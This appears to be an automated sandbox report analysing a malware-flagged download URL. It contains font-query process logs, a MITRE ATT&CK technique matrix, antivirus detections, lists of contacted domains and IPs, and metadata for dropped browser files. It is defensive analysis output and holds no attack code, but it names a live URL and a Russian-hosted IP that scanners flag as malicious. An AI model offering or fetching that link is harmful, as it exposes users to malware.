Source: C:\Windows\System32\SnippingTool.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation
Source: C:\Windows\System32\SnippingTool.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation
Source: C:\Windows\System32\SnippingTool.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation
Source: C:\Windows\System32\SnippingTool.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation
Source: C:\Windows\System32\SnippingTool.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation
Source: C:\Windows\System32\SnippingTool.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation
Source: C:\Windows\System32\SnippingTool.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation
Source: C:\Windows\System32\SnippingTool.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation
Source: C:\Windows\System32\SnippingTool.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation
Source: C:\Windows\System32\SnippingTool.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation
Source: C:\Windows\System32\SnippingTool.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation
Source: C:\Windows\System32\SnippingTool.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation
Source: C:\Windows\System32\SnippingTool.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation
Source: C:\Windows\System32\SnippingTool.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation
Source: C:\Windows\System32\SnippingTool.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation
Source: C:\Windows\System32\SnippingTool.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation
Source: C:\Windows\System32\SnippingTool.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation
Source: C:\Windows\System32\SnippingTool.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation
Source: C:\Windows\System32\SnippingTool.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation
Source: C:\Windows\System32\SnippingTool.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation
Source: C:\Windows\System32\SnippingTool.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation
Source: C:\Windows\System32\SnippingTool.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation
Source: C:\Windows\System32\SnippingTool.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation
Source: C:\Windows\System32\SnippingTool.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation
Source: C:\Windows\System32\SnippingTool.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation
Source: C:\Windows\System32\SnippingTool.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation
Source: C:\Windows\System32\SnippingTool.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation
Source: C:\Windows\System32\SnippingTool.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation
Source: C:\Windows\System32\SnippingTool.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation
Source: C:\Windows\System32\SnippingTool.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation
Source: C:\Windows\System32\SnippingTool.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation
Source: C:\Windows\System32\SnippingTool.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation
Source: C:\Windows\System32\SnippingTool.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation
Source: C:\Windows\System32\SnippingTool.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation
Source: C:\Windows\System32\SnippingTool.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation
Source: C:\Windows\System32\SnippingTool.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation
Source: C:\Windows\System32\SnippingTool.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation
Source: C:\Windows\System32\SnippingTool.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation
Source: C:\Windows\System32\SnippingTool.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation
Source: C:\Windows\System32\SnippingTool.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation
Source: C:\Windows\System32\SnippingTool.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation
Source: C:\Windows\System32\SnippingTool.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation
Source: C:\Windows\System32\SnippingTool.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation
Source: C:\Windows\System32\SnippingTool.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation
Source: C:\Windows\System32\SnippingTool.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation
Source: C:\Windows\System32\SnippingTool.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation
Source: C:\Windows\System32\SnippingTool.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation
Source: C:\Windows\System32\SnippingTool.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation
Source: C:\Windows\System32\SnippingTool.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation
Source: C:\Windows\System32\SnippingTool.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation
Source: C:\Windows\System32\SnippingTool.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation
Source: C:\Windows\System32\SnippingTool.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation
Source: C:\Windows\System32\SnippingTool.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation
Source: C:\Windows\System32\SnippingTool.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation
Source: C:\Windows\System32\SnippingTool.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation
Source: C:\Windows\System32\SnippingTool.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation
Source: C:\Windows\System32\SnippingTool.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation
Source: C:\Windows\System32\SnippingTool.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation
Source: C:\Windows\System32\SnippingTool.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation
Source: C:\Windows\System32\SnippingTool.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation
Source: C:\Windows\System32\SnippingTool.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation
Source: C:\Windows\System32\SnippingTool.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation
Source: C:\Windows\System32\SnippingTool.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation
Source: C:\Windows\System32\SnippingTool.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation
Source: C:\Windows\System32\SnippingTool.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation
Source: C:\Windows\System32\SnippingTool.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation
Source: C:\Windows\System32\SnippingTool.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation
Source: C:\Windows\System32\SnippingTool.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation
Source: C:\Windows\System32\SnippingTool.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation
Source: C:\Windows\System32\SnippingTool.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation
Source: C:\Windows\System32\SnippingTool.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation
Source: C:\Windows\System32\SnippingTool.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation
Source: C:\Windows\System32\SnippingTool.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation
Source: C:\Windows\System32\SnippingTool.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation
Source: C:\Windows\System32\SnippingTool.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation
Source: C:\Windows\System32\SnippingTool.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation
Source: C:\Windows\System32\SnippingTool.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation
Source: C:\Windows\System32\SnippingTool.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation
Source: C:\Windows\System32\SnippingTool.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation
Source: C:\Windows\System32\SnippingTool.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation
Source: C:\Windows\System32\SnippingTool.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation
Source: C:\Windows\System32\SnippingTool.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation
Source: C:\Windows\System32\SnippingTool.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation
Source: C:\Windows\System32\SnippingTool.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation
Source: C:\Windows\System32\SnippingTool.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation
Source: C:\Windows\System32\SnippingTool.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation
Source: C:\Windows\System32\SnippingTool.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation
Source: C:\Windows\System32\SnippingTool.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation
Source: C:\Windows\System32\SnippingTool.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation
Source: C:\Windows\System32\SnippingTool.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation
Source: C:\Windows\System32\SnippingTool.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation
Source: C:\Windows\System32\SnippingTool.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation
Source: C:\Windows\System32\SnippingTool.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation
Source: C:\Windows\System32\SnippingTool.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation
Source: C:\Windows\System32\SnippingTool.exeQueries volume information: C:\Windows\Fonts\flat_officeFontsPreview.ttf VolumeInformation
Source: C:\Windows\System32\SnippingTool.exeQueries volume information: C:\Windows\Fonts\OFFSYM.TTF VolumeInformation
Source: C:\Windows\System32\SnippingTool.exeQueries volume information: C:\Windows\Fonts\OFFSYMSL.TTF VolumeInformation
Source: C:\Windows\System32\SnippingTool.exeQueries volume information: C:\Windows\Fonts\OFFSYMSB.TTF VolumeInformation
Source: C:\Windows\System32\SnippingTool.exeQueries volume information: C:\Windows\Fonts\OFFSYMXL.TTF VolumeInformation
Source: C:\Windows\System32\SnippingTool.exeQueries volume information: C:\Windows\Fonts\OFFSYML.TTF VolumeInformation
Source: C:\Windows\System32\SnippingTool.exeQueries volume information: C:\Windows\Fonts\OFFSYMB.TTF VolumeInformation
Source: C:\Windows\System32\SnippingTool.exeQueries volume information: C:\Windows\Fonts\segoeui.ttf VolumeInformation
Source: C:\Windows\System32\SnippingTool.exeQueries volume information: C:\Windows\Fonts\segoeui.ttf VolumeInformation
Source: C:\Windows\System32\SnippingTool.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
Source: C:\Windows\System32\SnippingTool.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
Source: C:\Windows\System32\SnippingTool.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
Source: C:\Windows\System32\SnippingTool.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
Source: C:\Windows\System32\SnippingTool.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
Source: C:\Windows\System32\SnippingTool.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
Source: C:\Windows\System32\SnippingTool.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
Source: C:\Windows\System32\SnippingTool.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
Source: C:\Windows\System32\SnippingTool.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
Source: C:\Windows\System32\SnippingTool.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation
Source: C:\Windows\System32\SnippingTool.exeQueries volume information: C:\Windows\Fonts\segoeui.ttf VolumeInformation
Source: C:\Windows\System32\SnippingTool.exeQueries volume information: C:\Windows\Fonts\segoeui.ttf VolumeInformation
Source: C:\Windows\System32\SnippingTool.exeQueries volume information: C:\Windows\Fonts\segoeui.ttf VolumeInformation
Source: C:\Windows\System32\SnippingTool.exeQueries volume information: C:\Windows\Fonts\segoeui.ttf VolumeInformation
Source: C:\Windows\System32\SnippingTool.exeQueries volume information: C:\Windows\Fonts\segoeui.ttf VolumeInformation
Source: C:\Windows\System32\SnippingTool.exeQueries volume information: C:\Windows\Fonts\segoeui.ttf VolumeInformation
Source: C:\Windows\System32\SnippingTool.exeQueries volume information: C:\Windows\Fonts\segoeui.ttf VolumeInformation
Source: C:\Windows\System32\SnippingTool.exeQueries volume information: C:\Windows\Fonts\segoeui.ttf VolumeInformation
Source: C:\Windows\System32\SnippingTool.exeQueries volume information: C:\Windows\Fonts\segoeui.ttf VolumeInformation
Source: C:\Windows\System32\SnippingTool.exeQueries volume information: C:\Windows\Fonts\segoeui.ttf VolumeInformation
Source: C:\Windows\System32\SnippingTool.exeQueries volume information: C:\Windows\Fonts\segoeui.ttf VolumeInformation
Source: C:\Windows\System32\SnippingTool.exeQueries volume information: C:\Windows\Fonts\segoeui.ttf VolumeInformation
Source: C:\Windows\System32\SnippingTool.exeQueries volume information: C:\Windows\Fonts\segoeui.ttf VolumeInformation
Source: C:\Windows\System32\SnippingTool.exeQueries volume information: C:\Windows\Fonts\segoeui.ttf VolumeInformation
Source: C:\Windows\System32\SnippingTool.exeQueries volume information: C:\Windows\Fonts\segoeui.ttf VolumeInformation

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
DLL Side-Loading		1
Process Injection		1
Masquerading		OS Credential Dumping1
Virtualization/Sandbox Evasion		Remote ServicesData from Local System2
Encrypted Channel		Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/Job1
Registry Run Keys / Startup Folder		1
DLL Side-Loading		1
Virtualization/Sandbox Evasion		LSASS Memory1
File and Directory Discovery		Remote Desktop ProtocolData from Removable Media1
Non-Application Layer Protocol		Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
Registry Run Keys / Startup Folder		1
Process Injection		Security Account Manager11
System Information Discovery		SMB/Windows Admin SharesData from Network Shared Drive2
Application Layer Protocol		Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
DLL Side-Loading		NTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
https://nekofile.eu.org/f8e2cb54931bf39d6c12eo5nc100%Avira URL Cloudmalware
https://nekofile.eu.org/f8e2cb54931bf39d6c12eo5nc4%VirustotalBrowse

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

SourceDetectionScannerLabelLink
nekofile.eu.org6%VirustotalBrowse
www.google.com0%VirustotalBrowse
assets.msn.com0%VirustotalBrowse
c-9999.c-msedge.net0%VirustotalBrowse
googlehosted.l.googleusercontent.com0%VirustotalBrowse
clients2.googleusercontent.com0%VirustotalBrowse
sb.scorecardresearch.com0%VirustotalBrowse
bzib.nelreports.net0%VirustotalBrowse
ntp.msn.com0%VirustotalBrowse
c.msn.com0%VirustotalBrowse
api.msn.com0%VirustotalBrowse
sni1gl.wpc.nucdn.net0%VirustotalBrowse
chrome.cloudflare-dns.com0%VirustotalBrowse
s-part-0032.t-0009.t-msedge.net0%VirustotalBrowse

URLs

No Antivirus matches

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
chrome.cloudflare-dns.com
172.64.41.3
truefalseunknown
c-9999.c-msedge.net
13.107.4.254
truefalseunknown
sb.scorecardresearch.com
18.244.18.27
truefalseunknown
www.google.com
142.250.186.132
truefalseunknown
nekofile.eu.org
159.253.120.239
truetrueunknown
googlehosted.l.googleusercontent.com
142.250.184.193
truefalseunknown
sni1gl.wpc.nucdn.net
152.199.21.175
truefalseunknown
s-part-0032.t-0009.t-msedge.net
13.107.246.60
truefalseunknown
clients2.googleusercontent.com
unknown
unknownfalseunknown
bzib.nelreports.net
unknown
unknownfalseunknown
assets.msn.com
unknown
unknownfalseunknown
c.msn.com
unknown
unknownfalseunknown
ntp.msn.com
unknown
unknownfalseunknown
api.msn.com
unknown
unknownfalseunknown

World Map of Contacted IPs

  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Public IPs

IPDomainCountryFlagASNASN NameMalicious
23.200.0.42
unknownUnited States
20940AKAMAI-ASN1EUfalse
13.107.6.158
unknownUnited States
8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
51.137.3.145
unknownUnited Kingdom
8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
2.23.209.12
unknownEuropean Union
1273CWVodafoneGroupPLCEUfalse
13.107.246.40
unknownUnited States
8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
142.250.74.206
unknownUnited States
15169GOOGLEUSfalse
23.200.0.6
unknownUnited States
20940AKAMAI-ASN1EUfalse
2.22.242.105
unknownEuropean Union
20940AKAMAI-ASN1EUfalse
13.107.21.200
unknownUnited States
8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
23.200.3.19
unknownUnited States
20940AKAMAI-ASN1EUfalse
18.244.18.27
sb.scorecardresearch.comUnited States
16509AMAZON-02USfalse
13.107.246.60
s-part-0032.t-0009.t-msedge.netUnited States
8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
74.125.206.84
unknownUnited States
15169GOOGLEUSfalse
108.139.47.50
unknownUnited States
16509AMAZON-02USfalse
162.159.61.3
unknownUnited States
13335CLOUDFLARENETUSfalse
142.250.185.163
unknownUnited States
15169GOOGLEUSfalse
20.189.173.18
unknownUnited States
8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
142.250.186.132
www.google.comUnited States
15169GOOGLEUSfalse
204.79.197.239
unknownUnited States
8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
142.250.186.110
unknownUnited States
15169GOOGLEUSfalse
20.110.205.119
unknownUnited States
8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
2.23.209.183
unknownEuropean Union
1273CWVodafoneGroupPLCEUfalse
204.79.197.219
unknownUnited States
8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
172.64.41.3
chrome.cloudflare-dns.comUnited States
13335CLOUDFLARENETUSfalse
1.1.1.1
unknownAustralia
13335CLOUDFLARENETUSfalse
13.107.21.237
unknownUnited States
8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
23.44.201.26
unknownUnited States
20940AKAMAI-ASN1EUfalse
52.231.230.148
unknownUnited States
8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
23.209.72.40
unknownUnited States
20940AKAMAI-ASN1EUfalse
142.250.184.193
googlehosted.l.googleusercontent.comUnited States
15169GOOGLEUSfalse
13.107.21.239
unknownUnited States
8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
216.58.206.67
unknownUnited States
15169GOOGLEUSfalse
23.200.0.38
unknownUnited States
20940AKAMAI-ASN1EUfalse
142.250.185.110
unknownUnited States
15169GOOGLEUSfalse
13.107.42.16
unknownUnited States
8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
20.82.9.214
unknownUnited States
8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
239.255.255.250
unknownReserved
unknownunknownfalse
2.23.209.193
unknownEuropean Union
1273CWVodafoneGroupPLCEUfalse
159.253.120.239
nekofile.eu.orgRussian Federation
42955TKDIALOG-ASRUtrue
20.75.60.91
unknownUnited States
8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
2.18.64.218
unknownEuropean Union
6057AdministracionNacionaldeTelecomunicacionesUYfalse
2.23.209.179
unknownEuropean Union
1273CWVodafoneGroupPLCEUfalse
204.79.197.203
unknownUnited States
8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse

Private

IP
192.168.2.16

General Information

Joe Sandbox version:40.0.0 Tourmaline
Analysis ID:1462805
Start date and time:2024-06-26 07:51:19 +02:00
Joe Sandbox product:CloudBasic
Overall analysis duration:
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:defaultwindowsinteractivecookbook.jbs
Sample URL:https://nekofile.eu.org/f8e2cb54931bf39d6c12eo5nc
Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:31
Number of new started drivers analysed:0
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:0
Technologies:
  • EGA enabled
Analysis Mode:stream
Analysis stop reason:Timeout
Detection:MAL
Classification:mal56.win@60/188@24/206

Warnings

  • Exclude process from analysis (whitelisted): svchost.exe
  • Excluded IPs from analysis (whitelisted): 142.250.185.163, 142.250.185.110, 74.125.206.84, 34.104.35.123
  • Excluded domains from analysis (whitelisted): clients2.google.com, accounts.google.com, edgedl.me.gvt1.com, clientservices.googleapis.com, clients.l.google.com
  • Not all processes where analyzed, report is missing behavior information
  • Report size getting too big, too many NtOpenFile calls found.
  • Report size getting too big, too many NtOpenKeyEx calls found.
  • Report size getting too big, too many NtProtectVirtualMemory calls found.
  • Report size getting too big, too many NtQueryValueKey calls found.
  • Report size getting too big, too many NtWriteVirtualMemory calls found.

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\4a81d056-f0cf-442c-8423-c028e2f1809f.tmp

Download File
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:JSON data
Category:dropped
Size (bytes):58109
Entropy (8bit):6.106303739870832
Encrypted:false
SSDEEP:
MD5:6E51821612F9FA32AA52C2A69FA06BD4
SHA1:B5B88A4F6E40600ECFE7A66DE3A5BE7CCB1FEFC9
SHA-256:1ED05575B4FD526DB4A6990ACCA81AE1D5FF9EB927274B64A39A349C6B5870D3
SHA-512:3136475343F261AD20A0D89D8C021BCD996FA6F0B8F82E3B14377B76CFD4E7103F937E9F979464632C8E5DE2F34C17E69AF4F2E2BB3EA1C27F7E7DF129E59D3F
Malicious:false
Reputation:unknown
Preview:{"abusive_adblocker_etag":"\"8ABCE35666CBACA121128B98C75E78308AAC1CE803625FAFB4A7AFA722C77CA4\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Ad Blocking\76e17e18-e35c-4484-9787-67f3800f6080.tmp

Download File
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:JSON data
Category:dropped
Size (bytes):107893
Entropy (8bit):4.640154386428977
Encrypted:false
SSDEEP:
MD5:699321C3678CD2A2BEA7B2744984E666
SHA1:835E00F16EBAF711814347CE0BFB724D01063F98
SHA-256:C9BD89E18EECB3AE60F7B561D7ED04D05127A758816C7401DF92AAE2E2B73E5E
SHA-512:BBB4D5ACE1A92164AB63CA0AFEE0700F5F7A55F0474C58BC23A0CB64E40E4EC91008FDFD0ABE6CC6305B15E858C2460B6E6F3FFE74E9E6E0951C83C230025947
Malicious:false
Reputation:unknown
Preview:{"sites":[{"url":"24video.be"},{"url":"7dnifutbol.bg"},{"url":"6tv.dk"},{"url":"9kefa.com"},{"url":"aculpaedoslb.blogspot.pt"},{"url":"aek-live.gr"},{"url":"arcadepunk.co.uk"},{"url":"acidimg.cc"},{"url":"aazah.com"},{"url":"allehensbeverwijk.nl"},{"url":"amateurgonewild.org"},{"url":"aindasoudotempo.blogspot.com"},{"url":"anorthosis365.com"},{"url":"autoreview.bg"},{"url":"alivefoot.us"},{"url":"arbitro10.com"},{"url":"allhard.org"},{"url":"babesnude.info"},{"url":"aysel.today"},{"url":"animepornx.com"},{"url":"bahisideal20.com"},{"url":"analyseindustrie.nl"},{"url":"bahis10line.org"},{"url":"apoel365.net"},{"url":"bahissitelerisikayetleri.com"},{"url":"bambusratte.com"},{"url":"banzaj.pl"},{"url":"barlevegas.com"},{"url":"baston.info"},{"url":"atomcurve.com"},{"url":"atascadocherba.com"},{"url":"astrologer.gr"},{"url":"adultpicz.com"},{"url":"alleporno.com"},{"url":"beaver-tube.com"},{"url":"beachbabes.info"},{"url":"bearworldmagazine.com"},{"url":"bebegimdensonra.com"},{"url":"autoy

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Ad Blocking\blocklist (copy)

Download File
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:JSON data
Category:dropped
Size (bytes):0
Entropy (8bit):0.0
Encrypted:false
SSDEEP:
MD5:699321C3678CD2A2BEA7B2744984E666
SHA1:835E00F16EBAF711814347CE0BFB724D01063F98
SHA-256:C9BD89E18EECB3AE60F7B561D7ED04D05127A758816C7401DF92AAE2E2B73E5E
SHA-512:BBB4D5ACE1A92164AB63CA0AFEE0700F5F7A55F0474C58BC23A0CB64E40E4EC91008FDFD0ABE6CC6305B15E858C2460B6E6F3FFE74E9E6E0951C83C230025947
Malicious:false
Reputation:unknown
Preview:{"sites":[{"url":"24video.be"},{"url":"7dnifutbol.bg"},{"url":"6tv.dk"},{"url":"9kefa.com"},{"url":"aculpaedoslb.blogspot.pt"},{"url":"aek-live.gr"},{"url":"arcadepunk.co.uk"},{"url":"acidimg.cc"},{"url":"aazah.com"},{"url":"allehensbeverwijk.nl"},{"url":"amateurgonewild.org"},{"url":"aindasoudotempo.blogspot.com"},{"url":"anorthosis365.com"},{"url":"autoreview.bg"},{"url":"alivefoot.us"},{"url":"arbitro10.com"},{"url":"allhard.org"},{"url":"babesnude.info"},{"url":"aysel.today"},{"url":"animepornx.com"},{"url":"bahisideal20.com"},{"url":"analyseindustrie.nl"},{"url":"bahis10line.org"},{"url":"apoel365.net"},{"url":"bahissitelerisikayetleri.com"},{"url":"bambusratte.com"},{"url":"banzaj.pl"},{"url":"barlevegas.com"},{"url":"baston.info"},{"url":"atomcurve.com"},{"url":"atascadocherba.com"},{"url":"astrologer.gr"},{"url":"adultpicz.com"},{"url":"alleporno.com"},{"url":"beaver-tube.com"},{"url":"beachbabes.info"},{"url":"bearworldmagazine.com"},{"url":"bebegimdensonra.com"},{"url":"autoy

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\BrowserMetrics\BrowserMetrics-667BACAF-1AD8.pma

Download File
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:data
Category:dropped
Size (bytes):4194304
Entropy (8bit):0.44846730262784273
Encrypted:false
